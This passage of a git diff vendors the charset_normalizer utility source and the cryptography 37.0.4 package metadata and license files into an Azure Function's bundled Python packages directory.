unicode_path + self.encoding: Optional[str] = encoding + self.encoding_aliases: List[str] = encoding_aliases + self.alternative_encodings: List[str] = alternative_encodings + self.language: str = language + self.alphabets: List[str] = alphabets + self.has_sig_or_bom: bool = has_sig_or_bom + self.chaos: float = chaos + self.coherence: float = coherence + self.is_preferred: bool = is_preferred + + @property + def __dict__(self) -> Dict[str, Any]: # type: ignore + return { + "path": self.path, + "encoding": self.encoding, + "encoding_aliases": self.encoding_aliases, + "alternative_encodings": self.alternative_encodings, + "language": self.language, + "alphabets": self.alphabets, + "has_sig_or_bom": self.has_sig_or_bom, + "chaos": self.chaos, + "coherence": self.coherence, + "unicode_path": self.unicode_path, + "is_preferred": self.is_preferred, + } + + def to_json(self) -> str: + return dumps(self.__dict__, ensure_ascii=True, indent=4) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/utils.py new file mode 100644 index 0000000..e1f576d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/utils.py @@ -0,0 +1,414 @@ +try: + # WARNING: unicodedata2 support is going to be removed in 3.0 + # Python is 
quickly catching up. + import unicodedata2 as unicodedata +except ImportError: + import unicodedata # type: ignore[no-redef] + +import importlib +import logging +from codecs import IncrementalDecoder +from encodings.aliases import aliases +from functools import lru_cache +from re import findall +from typing import Generator, List, Optional, Set, Tuple, Union + +from _multibytecodec import MultibyteIncrementalDecoder # type: ignore + +from .constant import ( + ENCODING_MARKS, + IANA_SUPPORTED_SIMILAR, + RE_POSSIBLE_ENCODING_INDICATION, + UNICODE_RANGES_COMBINED, + UNICODE_SECONDARY_RANGE_KEYWORD, + UTF8_MAXIMAL_ALLOCATION, +) + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_accentuated(character: str) -> bool: + try: + description: str = unicodedata.name(character) + except ValueError: + return False + return ( + "WITH GRAVE" in description + or "WITH ACUTE" in description + or "WITH CEDILLA" in description + or "WITH DIAERESIS" in description + or "WITH CIRCUMFLEX" in description + or "WITH TILDE" in description + ) + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def remove_accent(character: str) -> str: + decomposed: str = unicodedata.decomposition(character) + if not decomposed: + return character + + codes: List[str] = decomposed.split(" ") + + return chr(int(codes[0], 16)) + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def unicode_range(character: str) -> Optional[str]: + """ + Retrieve the Unicode range official name from a single character. + """ + character_ord: int = ord(character) + + for range_name, ord_range in UNICODE_RANGES_COMBINED.items(): + if character_ord in ord_range: + return range_name + + return None + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_latin(character: str) -> bool: + try: + description: str = unicodedata.name(character) + except ValueError: + return False + return "LATIN" in description + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_ascii(character: str) -> bool: + try: + character.encode("ascii") + except UnicodeEncodeError: + return False + return True + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_punctuation(character: str) -> bool: + character_category: str = unicodedata.category(character) + + if "P" in character_category: + return True + + character_range: Optional[str] = unicode_range(character) + + if character_range is None: + return False + + return "Punctuation" in character_range + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_symbol(character: str) -> bool: + character_category: str = unicodedata.category(character) + + if "S" in character_category or "N" in character_category: + return True + + character_range: Optional[str] = unicode_range(character) + + if character_range is None: + return False + + return "Forms" in character_range + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_emoticon(character: str) -> bool: + character_range: Optional[str] = unicode_range(character) + + if character_range is None: + return False + + return "Emoticons" in character_range + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_separator(character: str) -> bool: + if character.isspace() or character in {"|", "+", ",", ";", "<", ">"}: + return True + + character_category: str = unicodedata.category(character) + + return "Z" in character_category + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_case_variable(character: str) -> bool: + return character.islower() != character.isupper() + + +def is_private_use_only(character: str) -> bool: + character_category: str = 
unicodedata.category(character)
+
+    return character_category == "Co"
+
+
+@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION)
+def is_cjk(character: str) -> bool:
+    try:
+        character_name = unicodedata.name(character)
+    except ValueError:
+        return False
+
+    return "CJK" in character_name
+
+
+@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION)
+def is_hiragana(character: str) -> bool:
+    try:
+        character_name = unicodedata.name(character)
+    except ValueError:
+        return False
+
+    return "HIRAGANA" in character_name
+
+
+@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION)
+def is_katakana(character: str) -> bool:
+    try:
+        character_name = unicodedata.name(character)
+    except ValueError:
+        return False
+
+    return "KATAKANA" in character_name
+
+
+@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION)
+def is_hangul(character: str) -> bool:
+    try:
+        character_name = unicodedata.name(character)
+    except ValueError:
+        return False
+
+    return "HANGUL" in character_name
+
+
+@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION)
+def is_thai(character: str) -> bool:
+    try:
+        character_name = unicodedata.name(character)
+    except ValueError:
+        return False
+
+    return "THAI" in character_name
+
+
+@lru_cache(maxsize=len(UNICODE_RANGES_COMBINED))
+def is_unicode_range_secondary(range_name: str) -> bool:
+    return any(keyword in range_name for keyword in UNICODE_SECONDARY_RANGE_KEYWORD)
+
+
+@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION)
+def is_unprintable(character: str) -> bool:
+    return (
+        character.isspace() is False  # includes \n \t \r \v
+        and character.isprintable() is False
+        and character != "\x1A"  # Why? It's the ASCII substitute character.
+        and character != b"\xEF\xBB\xBF".decode("utf_8")  # bug discovered in Python:
+        # Zero Width No-Break Space, located in Arabic Presentation Forms-B (Unicode 1.1), is not acknowledged as a space.
+    )
+
+
+def any_specified_encoding(sequence: bytes, search_zone: int = 4096) -> Optional[str]:
+    """
+    Extract any declared encoding from the first n bytes, using an ASCII-only decoder.
+    """
+    if not isinstance(sequence, bytes):
+        raise TypeError
+
+    seq_len: int = len(sequence)
+
+    results: List[str] = findall(
+        RE_POSSIBLE_ENCODING_INDICATION,
+        sequence[: min(seq_len, search_zone)].decode("ascii", errors="ignore"),
+    )
+
+    if len(results) == 0:
+        return None
+
+    for specified_encoding in results:
+        specified_encoding = specified_encoding.lower().replace("-", "_")
+
+        for encoding_alias, encoding_iana in aliases.items():
+            if encoding_alias == specified_encoding:
+                return encoding_iana
+            if encoding_iana == specified_encoding:
+                return encoding_iana
+
+    return None
+
+
+@lru_cache(maxsize=128)
+def is_multi_byte_encoding(name: str) -> bool:
+    """
+    Verify whether a specific encoding is multi-byte, based on its IANA name.
+    """
+    return name in {
+        "utf_8",
+        "utf_8_sig",
+        "utf_16",
+        "utf_16_be",
+        "utf_16_le",
+        "utf_32",
+        "utf_32_le",
+        "utf_32_be",
+        "utf_7",
+    } or issubclass(
+        importlib.import_module("encodings.{}".format(name)).IncrementalDecoder,  # type: ignore
+        MultibyteIncrementalDecoder,
+    )
+
+
+def identify_sig_or_bom(sequence: bytes) -> Tuple[Optional[str], bytes]:
+    """
+    Identify and extract the SIG/BOM in the given sequence.
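+    Returns the IANA encoding name and the matched mark, or (None, b"") when none is found.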
+ """ + + for iana_encoding in ENCODING_MARKS: + marks: Union[bytes, List[bytes]] = ENCODING_MARKS[iana_encoding] + + if isinstance(marks, bytes): + marks = [marks] + + for mark in marks: + if sequence.startswith(mark): + return iana_encoding, mark + + return None, b"" + + +def should_strip_sig_or_bom(iana_encoding: str) -> bool: + return iana_encoding not in {"utf_16", "utf_32"} + + +def iana_name(cp_name: str, strict: bool = True) -> str: + cp_name = cp_name.lower().replace("-", "_") + + for encoding_alias, encoding_iana in aliases.items(): + if cp_name in [encoding_alias, encoding_iana]: + return encoding_iana + + if strict: + raise ValueError("Unable to retrieve IANA for '{}'".format(cp_name)) + + return cp_name + + +def range_scan(decoded_sequence: str) -> List[str]: + ranges: Set[str] = set() + + for character in decoded_sequence: + character_range: Optional[str] = unicode_range(character) + + if character_range is None: + continue + + ranges.add(character_range) + + return list(ranges) + + +def cp_similarity(iana_name_a: str, iana_name_b: str) -> float: + + if is_multi_byte_encoding(iana_name_a) or is_multi_byte_encoding(iana_name_b): + return 0.0 + + decoder_a = importlib.import_module("encodings.{}".format(iana_name_a)).IncrementalDecoder # type: ignore + decoder_b = importlib.import_module("encodings.{}".format(iana_name_b)).IncrementalDecoder # type: ignore + + id_a: IncrementalDecoder = decoder_a(errors="ignore") + id_b: IncrementalDecoder = decoder_b(errors="ignore") + + character_match_count: int = 0 + + for i in range(255): + to_be_decoded: bytes = bytes([i]) + if id_a.decode(to_be_decoded) == id_b.decode(to_be_decoded): + character_match_count += 1 + + return character_match_count / 254 + + +def is_cp_similar(iana_name_a: str, iana_name_b: str) -> bool: + """ + Determine if two code page are at least 80% similar. IANA_SUPPORTED_SIMILAR dict was generated using + the function cp_similarity. + """ + return ( + iana_name_a in IANA_SUPPORTED_SIMILAR + and iana_name_b in IANA_SUPPORTED_SIMILAR[iana_name_a] + ) + + +def set_logging_handler( + name: str = "charset_normalizer", + level: int = logging.INFO, + format_string: str = "%(asctime)s | %(levelname)s | %(message)s", +) -> None: + + logger = logging.getLogger(name) + logger.setLevel(level) + + handler = logging.StreamHandler() + handler.setFormatter(logging.Formatter(format_string)) + logger.addHandler(handler) + + +def cut_sequence_chunks( + sequences: bytes, + encoding_iana: str, + offsets: range, + chunk_size: int, + bom_or_sig_available: bool, + strip_sig_or_bom: bool, + sig_payload: bytes, + is_multi_byte_decoder: bool, + decoded_payload: Optional[str] = None, +) -> Generator[str, None, None]: + + if decoded_payload and is_multi_byte_decoder is False: + for i in offsets: + chunk = decoded_payload[i : i + chunk_size] + if not chunk: + break + yield chunk + else: + for i in offsets: + chunk_end = i + chunk_size + if chunk_end > len(sequences) + 8: + continue + + cut_sequence = sequences[i : i + chunk_size] + + if bom_or_sig_available and strip_sig_or_bom is False: + cut_sequence = sig_payload + cut_sequence + + chunk = cut_sequence.decode( + encoding_iana, + errors="ignore" if is_multi_byte_decoder else "strict", + ) + + # multi-byte bad cutting detector and adjustment + # not the cleanest way to perform that fix but clever enough for now. 
+ if is_multi_byte_decoder and i > 0 and sequences[i] >= 0x80: + + chunk_partial_size_chk: int = min(chunk_size, 16) + + if ( + decoded_payload + and chunk[:chunk_partial_size_chk] not in decoded_payload + ): + for j in range(i, i - 4, -1): + cut_sequence = sequences[j:chunk_end] + + if bom_or_sig_available and strip_sig_or_bom is False: + cut_sequence = sig_payload + cut_sequence + + chunk = cut_sequence.decode(encoding_iana, errors="ignore") + + if chunk[:chunk_partial_size_chk] in decoded_payload: + break + + yield chunk diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/version.py new file mode 100644 index 0000000..485f321 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/version.py @@ -0,0 +1,6 @@ +""" +Expose version +""" + +__version__ = "2.1.0" +VERSION = __version__.split(".") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE new file mode 100644 index 0000000..454385e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE @@ -0,0 +1,6 @@ +This software is made available under the terms of *either* of the licenses +found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made +under the terms of *both* these licenses. + +The code used in the OS random engine is derived from CPython, and is licensed +under the terms of the PSF License Agreement. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.APACHE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.APACHE new file mode 100644 index 0000000..a082ed2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.APACHE @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + https://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. 
For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. 
Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. 
This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + https://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. 
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.BSD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.BSD new file mode 100644 index 0000000..a1805f9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.BSD @@ -0,0 +1,27 @@ +Copyright (c) Individual contributors. +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + + 1. Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. Neither the name of PyCA Cryptography nor the names of its contributors + may be used to endorse or promote products derived from this software + without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR +ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON +ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.PSF b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.PSF new file mode 100644 index 0000000..08df053 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.PSF @@ -0,0 +1,41 @@ +1. This LICENSE AGREEMENT is between the Python Software Foundation ("PSF"), and + the Individual or Organization ("Licensee") accessing and otherwise using Python + 2.7.12 software in source or binary form and its associated documentation. + +2. Subject to the terms and conditions of this License Agreement, PSF hereby + grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce, + analyze, test, perform and/or display publicly, prepare derivative works, + distribute, and otherwise use Python 2.7.12 alone or in any derivative + version, provided, however, that PSF's License Agreement and PSF's notice of + copyright, i.e., "Copyright © 2001-2016 Python Software Foundation; All Rights + Reserved" are retained in Python 2.7.12 alone or in any derivative version + prepared by Licensee. + +3. 
In the event Licensee prepares a derivative work that is based on or + incorporates Python 2.7.12 or any part thereof, and wants to make the + derivative work available to others as provided herein, then Licensee hereby + agrees to include in any such work a brief summary of the changes made to Python + 2.7.12. + +4. PSF is making Python 2.7.12 available to Licensee on an "AS IS" basis. + PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF + EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION OR + WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE + USE OF PYTHON 2.7.12 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS. + +5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 2.7.12 + FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF + MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.7.12, OR ANY DERIVATIVE + THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. + +6. This License Agreement will automatically terminate upon a material breach of + its terms and conditions. + +7. Nothing in this License Agreement shall be deemed to create any relationship + of agency, partnership, or joint venture between PSF and Licensee. This License + Agreement does not grant permission to use PSF trademarks or trade name in a + trademark sense to endorse or promote products or services of Licensee, or any + third party. + +8. By copying, installing or otherwise using Python 2.7.12, Licensee agrees + to be bound by the terms and conditions of this License Agreement. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/METADATA new file mode 100644 index 0000000..3c2b01d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/METADATA @@ -0,0 +1,141 @@ +Metadata-Version: 2.1 +Name: cryptography +Version: 37.0.4 +Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers. 
+Home-page: https://github.com/pyca/cryptography +Author: The Python Cryptographic Authority and individual contributors +Author-email: cryptography-dev@python.org +License: BSD-3-Clause OR Apache-2.0 +Project-URL: Documentation, https://cryptography.io/ +Project-URL: Source, https://github.com/pyca/cryptography/ +Project-URL: Issues, https://github.com/pyca/cryptography/issues +Project-URL: Changelog, https://cryptography.io/en/latest/changelog/ +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Apache Software License +Classifier: License :: OSI Approved :: BSD License +Classifier: Natural Language :: English +Classifier: Operating System :: MacOS :: MacOS X +Classifier: Operating System :: POSIX +Classifier: Operating System :: POSIX :: BSD +Classifier: Operating System :: POSIX :: Linux +Classifier: Operating System :: Microsoft :: Windows +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Security :: Cryptography +Requires-Python: >=3.6 +Description-Content-Type: text/x-rst +License-File: LICENSE +License-File: LICENSE.APACHE +License-File: LICENSE.BSD +License-File: LICENSE.PSF +Requires-Dist: cffi (>=1.12) +Provides-Extra: docs +Requires-Dist: sphinx (!=1.8.0,!=3.1.0,!=3.1.1,>=1.6.5) ; extra == 'docs' +Requires-Dist: sphinx-rtd-theme ; extra == 'docs' +Provides-Extra: docstest +Requires-Dist: pyenchant (>=1.6.11) ; extra == 'docstest' +Requires-Dist: twine (>=1.12.0) ; extra == 'docstest' +Requires-Dist: sphinxcontrib-spelling (>=4.0.1) ; extra == 'docstest' +Provides-Extra: pep8test +Requires-Dist: black ; extra == 'pep8test' +Requires-Dist: flake8 ; extra == 'pep8test' +Requires-Dist: flake8-import-order ; extra == 'pep8test' +Requires-Dist: pep8-naming ; extra == 'pep8test' +Provides-Extra: sdist +Requires-Dist: setuptools-rust (>=0.11.4) ; extra == 'sdist' +Provides-Extra: ssh +Requires-Dist: bcrypt (>=3.1.5) ; extra == 'ssh' +Provides-Extra: test +Requires-Dist: pytest (>=6.2.0) ; extra == 'test' +Requires-Dist: pytest-benchmark ; extra == 'test' +Requires-Dist: pytest-cov ; extra == 'test' +Requires-Dist: pytest-subtests ; extra == 'test' +Requires-Dist: pytest-xdist ; extra == 'test' +Requires-Dist: pretend ; extra == 'test' +Requires-Dist: iso8601 ; extra == 'test' +Requires-Dist: pytz ; extra == 'test' +Requires-Dist: hypothesis (!=3.79.2,>=1.11.4) ; extra == 'test' + +pyca/cryptography +================= + +.. image:: https://img.shields.io/pypi/v/cryptography.svg + :target: https://pypi.org/project/cryptography/ + :alt: Latest Version + +.. image:: https://readthedocs.org/projects/cryptography/badge/?version=latest + :target: https://cryptography.io + :alt: Latest Docs + +.. image:: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main + :target: https://github.com/pyca/cryptography/actions?query=workflow%3ACI+branch%3Amain + +.. 
image:: https://codecov.io/github/pyca/cryptography/coverage.svg?branch=main
+    :target: https://codecov.io/github/pyca/cryptography?branch=main
+
+
+``cryptography`` is a package which provides cryptographic recipes and
+primitives to Python developers. Our goal is for it to be your "cryptographic
+standard library". It supports Python 3.6+ and PyPy3 7.2+.
+
+``cryptography`` includes both high level recipes and low level interfaces to
+common cryptographic algorithms such as symmetric ciphers, message digests, and
+key derivation functions. For example, to encrypt something with
+``cryptography``'s high level symmetric encryption recipe:
+
+.. code-block:: pycon
+
+    >>> from cryptography.fernet import Fernet
+    >>> # Put this somewhere safe!
+    >>> key = Fernet.generate_key()
+    >>> f = Fernet(key)
+    >>> token = f.encrypt(b"A really secret message. Not for prying eyes.")
+    >>> token
+    b'...'
+    >>> f.decrypt(token)
+    b'A really secret message. Not for prying eyes.'
+
+You can find more information in the `documentation`_.
+
+You can install ``cryptography`` with:
+
+.. code-block:: console
+
+    $ pip install cryptography
+
+For full details see `the installation documentation`_.
+
+Discussion
+~~~~~~~~~~
+
+If you run into bugs, you can file them in our `issue tracker`_.
+
+We maintain a `cryptography-dev`_ mailing list for development discussion.
+
+You can also join ``#pyca`` on ``irc.libera.chat`` to ask questions or get
+involved.
+
+Security
+~~~~~~~~
+
+Need to report a security issue? Please consult our `security reporting`_
+documentation.
+
+
+.. _`documentation`: https://cryptography.io/
+.. _`the installation documentation`: https://cryptography.io/en/latest/installation/
+.. _`issue tracker`: https://github.com/pyca/cryptography/issues
+.. _`cryptography-dev`: https://mail.python.org/mailman/listinfo/cryptography-dev
+..
